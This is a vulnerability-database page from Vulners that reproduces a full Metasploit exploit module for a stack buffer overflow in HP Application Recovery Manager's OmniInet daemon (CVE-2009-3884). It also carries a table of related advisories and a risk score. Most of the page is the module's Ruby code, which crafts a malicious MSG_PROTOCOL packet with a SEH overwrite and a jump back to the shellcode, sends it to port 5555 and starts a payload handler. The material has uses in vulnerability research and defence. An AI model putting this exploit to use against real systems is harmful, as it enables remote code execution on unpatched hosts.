Vulners
Lucene search
HP Application Recovery Manager (OmniInet.exe) Buffer Overflow
| Reporter | Title | Published | Views | Family All 86 |
|---|---|---|---|---|
 | HP Application Recovery Manager (OmniInet.exe) Buffer Overflow | 26 Dec 200900:00 | – | zdt |
 | CentOS 5 : java-1.6.0-openjdk (CESA-2009:1584) | 29 Jun 201300:00 | – | nessus |
| Fedora 11 : java-1.6.0-openjdk-1.6.0.0-30.b16.fc11 (2009-11486) | 16 Nov 200900:00 | – | nessus |
| Fedora 12 : java-1.6.0-openjdk-1.6.0.0-33.b16.fc12 (2009-11489) | 16 Nov 200900:00 | – | nessus |
| Fedora 10 : java-1.6.0-openjdk-1.6.0.0-23.b16.fc10 (2009-11490) | 16 Nov 200900:00 | – | nessus |
| GLSA-200911-02 : Sun JDK/JRE: Multiple vulnerabilities | 18 Nov 200900:00 | – | nessus |
| Mac OS X : Java for Mac OS X 10.5 Update 6 | 4 Dec 200900:00 | – | nessus |
| Mac OS X : Java for Mac OS X 10.6 Update 1 | 4 Dec 200900:00 | – | nessus |
| Mandriva Linux Security Advisory : java-1.6.0-openjdk (MDVSA-2010:084) | 29 Apr 201000:00 | – | nessus |
| Oracle Linux 5 : java-1.6.0-openjdk (ELSA-2009-1584) | 12 Jul 201300:00 | – | nessus |
10
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Application Recovery Manager (OmniInet.exe) Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in HP Application Recovery Manager OmniInet daemon.
By sending a specially crafted MSG_PROTOCOL packet, a remote attacker may be able to execute arbitrary code.
},
'Author' => 'EgiX <n0b0d13s[at]gmail.com>',
'References' =>
[
[ 'CVE', '2009-3884' ],
[ 'BID', '37250' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-091' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 4658,
'BadChars' => '\x00',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x004412ed } ], # OmniInet.exe pop ecx; pop ecx; ret
],
'DefaultTarget' => 0))
register_options([Opt::RPORT(5555)], self.class)
end
def exploit
connect
off = payload_space + 8
sep = "\x00\x00\x20\x00"
buff = "\x00\x00\x12\x67" # packet length
buff << "\xff\xfe\x32\x00\x36\x00\x37\x00" # MSG_PROTOCOL command
buff << sep + rand_text_alpha_upper(2)
buff << sep + rand_text_alpha_upper(2)
buff << sep + rand_text_alpha_upper(2)
buff << sep + rand_text_alpha_upper(2)
buff << sep + payload.encoded + generate_seh_record(target.ret)
# jump back to shellcode
buff << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + off.to_s).encode_string
buff << sep
print_status("Sending MSG_PROTOCOL packet")
sock.put(buff)
sleep(5)
handler
disconnect
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Dec 2009 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.01349